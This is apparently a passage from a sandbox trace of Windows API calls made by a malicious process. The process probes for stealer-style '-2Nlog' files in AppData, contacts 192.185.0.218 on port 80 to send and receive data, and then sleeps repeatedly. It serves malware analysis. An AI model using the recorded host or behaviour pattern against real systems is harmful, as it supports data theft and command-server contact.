ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.613] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0197.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.613] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.613] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0197.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.613] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.613] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0197.614] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.614] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.614] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0197.614] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0197.614] socket (af=2, type=1, protocol=6) returned 0x2684 [0197.614] connect (s=0x2684, name=0x88841c0*(sa_family=2, sin_port=0x50, sin_addr="192.185.0.218"), namelen=16) returned 0 [0197.752] send (s=0x2684, buf=0xa10808a*, len=169, flags=0) returned 169 [0197.752] setsockopt (s=0x2684, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0197.752] recv (in: s=0x2684, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 749 [0197.903] closesocket (s=0x2684) returned 0 [0197.903] Sleep (dwMilliseconds=0x7d0) [0197.904] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.905] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.905] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0197.905] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894eda0) returned 1 [0197.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.905] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.905] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.905] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8950150) returned 1 [0197.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.905] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.905] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.905] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f460) returned 1 [0197.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.905] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.905] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.905] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fbb0) returned 1 [0197.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.905] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.905] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.905] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f460) returned 1 [0197.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.906] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.906] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.906] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894eda0) returned 1 [0197.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.906] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.906] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.906] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894eda0) returned 1 [0197.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.906] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.906] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.906] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fe80) returned 1 [0197.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.906] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.906] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.906] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f460) returned 1 [0197.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.906] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.906] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.906] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894eda0) returned 1 [0197.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.906] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.907] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0197.907] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fbb0) returned 1 [0197.907] Sleep (dwMilliseconds=0x7d0) [0197.908] Sleep (dwMilliseconds=0x7d0) [0197.909] Sleep (dwMilliseconds=0x7d0) [0197.911] Sleep (dwMilliseconds=0x7d0) [0197.912] Sleep (dwMilliseconds=0x7d0) [0197.914] Sleep (dwMilliseconds=0x7d0) [0197.915] Sleep (dwMilliseconds=0x7d0) [0197.917] Sleep (dwMilliseconds=0x7d0) [0197.919] Sleep (dwMilliseconds=0x7d0) [0197.920] Sleep (dwMilliseconds=0x7d0) [0197.921] Sleep (dwMilliseconds=0x7d0) [0197.923] Sleep (dwMilliseconds=0x7d0) [0197.924] Sleep (dwMilliseconds=0x7d0) [0197.926] Sleep (dwMilliseconds=0x7d0) [0197.927] Sleep (dwMilliseconds=0x7d0) [0197.929] Sleep (dwMilliseconds=0x7d0) [0197.930] Sleep (dwMilliseconds=0x7d0) [0197.932] Sleep (dwMilliseconds=0x7d0) [0197.933] Sleep (dwMilliseconds=0x7d0) [0197.936] Sleep (dwMilliseconds=0x7d0) [0197.937] Sleep (dwMilliseconds=0x7d0) [0197.938] Sleep (dwMilliseconds=0x7d0) [0197.940] Sleep (dwMilliseconds=0x7d0) [0197.941] Sleep (dwMilliseconds=0x7d0) [0197.943] Sleep (dwMilliseconds=0x7d0) [0197.944] Sleep (dwMilliseconds=0x7d0) [0197.946] Sleep (dwMilliseconds=0x7d0) [0197.947] Sleep (dwMilliseconds=0x7d0) [0197.949] Sleep (dwMilliseconds=0x7d0) [0197.950] Sleep (dwMilliseconds=0x7d0) [0197.952] Sleep (dwMilliseconds=0x7d0) [0197.953] Sleep (dwMilliseconds=0x7d0) [0197.955] Sleep (dwMilliseconds=0x7d0) [0197.956] Sleep (dwMilliseconds=0x7d0) [0197.958] Sleep (dwMilliseconds=0x7d0) [0197.960] Sleep (dwMilliseconds=0x7d0) [0197.961] Sleep (dwMilliseconds=0x7d0) [0197.962] Sleep (dwMilliseconds=0x7d0) [0197.964] Sleep (dwMilliseconds=0x7d0) [0197.965] Sleep (dwMilliseconds=0x7d0) [0197.967] Sleep (dwMilliseconds=0x7d0) [0197.968] Sleep (dwMilliseconds=0x7d0) [0197.970] Sleep (dwMilliseconds=0x7d0) [0197.971] Sleep (dwMilliseconds=0x7d0) [0197.972] Sleep (dwMilliseconds=0x7d0) [0197.974] Sleep (dwMilliseconds=0x7d0) [0197.975] Sleep (dwMilliseconds=0x7d0) [0197.977] Sleep (dwMilliseconds=0x7d0) [0197.979] Sleep (dwMilliseconds=0x7d0) [0197.980] Sleep (dwMilliseconds=0x7d0) [0197.981] Sleep (dwMilliseconds=0x7d0) [0197.983] Sleep (dwMilliseconds=0x7d0) [0197.984] Sleep (dwMilliseconds=0x7d0) [0197.986] Sleep (dwMilliseconds=0x7d0) [0197.987] Sleep (dwMilliseconds=0x7d0) [0197.989] Sleep (dwMilliseconds=0x7d0) [0197.990] Sleep (dwMilliseconds=0x7d0) [0197.992] Sleep (dwMilliseconds=0x7d0) [0197.993] Sleep (dwMilliseconds=0x7d0) [0197.995] Sleep (dwMilliseconds=0x7d0) [0197.996] Sleep (dwMilliseconds=0x7d0) [0197.998] Sleep (dwMilliseconds=0x7d0) [0197.999] Sleep (dwMilliseconds=0x7d0) [0198.001] Sleep (dwMilliseconds=0x7d0) [0198.002] Sleep (dwMilliseconds=0x7d0) [0198.004] Sleep (dwMilliseconds=0x7d0) [0198.005] Sleep (dwMilliseconds=0x7d0) [0198.007] Sleep (dwMilliseconds=0x7d0) [0198.009] Sleep (dwMilliseconds=0x7d0) [0198.010] Sleep (dwMilliseconds=0x7d0) [0198.011] Sleep (dwMilliseconds=0x7d0) [0198.013] Sleep (dwMilliseconds=0x7d0) [0198.014] Sleep (dwMilliseconds=0x7d0) [0198.016] Sleep (dwMilliseconds=0x7d0) [0198.017] Sleep (dwMilliseconds=0x7d0) [0198.019] Sleep (dwMilliseconds=0x7d0) [0198.020] Sleep (dwMilliseconds=0x7d0) [0198.022] Sleep (dwMilliseconds=0x7d0) [0198.023] Sleep (dwMilliseconds=0x7d0) [0198.025] Sleep (dwMilliseconds=0x7d0) [0198.026] Sleep (dwMilliseconds=0x7d0) [0198.028] Sleep (dwMilliseconds=0x7d0) [0198.030] Sleep (dwMilliseconds=0x7d0) [0198.031] Sleep (dwMilliseconds=0x7d0) [0198.033] Sleep (dwMilliseconds=0x7d0) [0198.035] Sleep (dwMilliseconds=0x7d0) [0198.037] Sleep (dwMilliseconds=0x7d0) [0198.039] Sleep (dwMilliseconds=0x7d0) [0198.040] Sleep (dwMilliseconds=0x7d0) [0198.042] Sleep (dwMilliseconds=0x7d0) [0198.043] Sleep (dwMilliseconds=0x7d0) [0198.045] Sleep (dwMilliseconds=0x7d0) [0198.046] Sleep (dwMilliseconds=0x7d0) [0198.047] Sleep (dwMilliseconds=0x7d0) [0198.049] Sleep (dwMilliseconds=0x7d0) [0198.051] Sleep (dwMilliseconds=0x7d0) [0198.052] Sleep (dwMilliseconds=0x7d0) [0198.053] Sleep (dwMilliseconds=0x7d0) [0198.055] Sleep (dwMilliseconds=0x7d0) [0198.057] Sleep (dwMilliseconds=0x7d0) [0198.059] Sleep (dwMilliseconds=0x7d0) [0198.060] Sleep (dwMilliseconds=0x7d0) [0198.062] Sleep (dwMilliseconds=0x7d0) [0198.063] Sleep (dwMilliseconds=0x7d0) [0198.065] Sleep (dwMilliseconds=0x7d0) [0198.066] Sleep (dwMilliseconds=0x7d0) [0198.067] Sleep (dwMilliseconds=0x7d0) [0198.069] Sleep (dwMilliseconds=0x7d0) [0198.071] Sleep (dwMilliseconds=0x7d0) [0198.072] Sleep (dwMilliseconds=0x7d0) [0198.074] Sleep (dwMilliseconds=0x7d0) [0198.075] Sleep (dwMilliseconds=0x7d0) [0198.077] Sleep (dwMilliseconds=0x7d0) [0198.078] Sleep (dwMilliseconds=0x7d0) [0198.080] Sleep (dwMilliseconds=0x7d0) [0198.082] Sleep (dwMilliseconds=0x7d0) [0198.083] Sleep (dwMilliseconds=0x7d0) [0198.085] Sleep (dwMilliseconds=0x7d0) [0198.086] Sleep (dwMilliseconds=0x7d0) [0198.087] Sleep (dwMilliseconds=0x7d0) [0198.089] Sleep (dwMilliseconds=0x7d0) [0198.090] Sleep (dwMilliseconds=0x7d0) [0198.092] Sleep (dwMilliseconds=0x7d0) [0198.093] Sleep (dwMilliseconds=0x7d0) [0198.095] Sleep (dwMilliseconds=0x7d0) 